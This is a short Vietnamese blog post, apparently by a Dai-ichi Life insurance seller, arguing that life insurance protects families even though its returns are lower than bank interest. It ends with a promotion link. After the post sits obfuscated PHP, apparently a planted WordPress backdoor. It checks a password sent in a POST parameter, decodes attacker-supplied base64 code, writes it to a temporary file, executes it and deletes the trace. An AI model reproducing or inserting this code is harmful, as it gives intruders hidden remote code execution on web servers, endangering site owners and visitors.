Blog

Lãi suất của Bảo hiểm nhân thọ kém hấp dẫn hơn Ngân hàng

Bạn cần hiểu rằng: chức năng chính của Bảo hiểm nhân thọ là bảo vệ trụ cột tài chính trong gia đình, phòng ngừa rủi ro, lãi suất của BHNT chỉ giúp phần nào giảm đi sự lạm phát. Còn Ngân hàng là một kênh đầu tư sinh lời an toàn, Ngân hàng không hề đền bù cho bạn khi bạn gặp phải rủi ro. Do đó, bạn cần phải hiểu sự khác nhau cơ bản này, xác định lại rằng: bạn đang cần bảo vệ tài chính trước những rủi ro, hay bạn đang muốn đầu tư sinh lời?Trên thực tế,dù lãi suất BHNT có thấp hơn thì tham gia BHNT vẫn có lợi hơn so với gửi Ngân hàng nếu số tiền tham gia vừa đủ.

Nhận chương trình khuyến mãi trực tiếp từ Dai Ichi Life

Nhận chương trình khuyến mãi
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}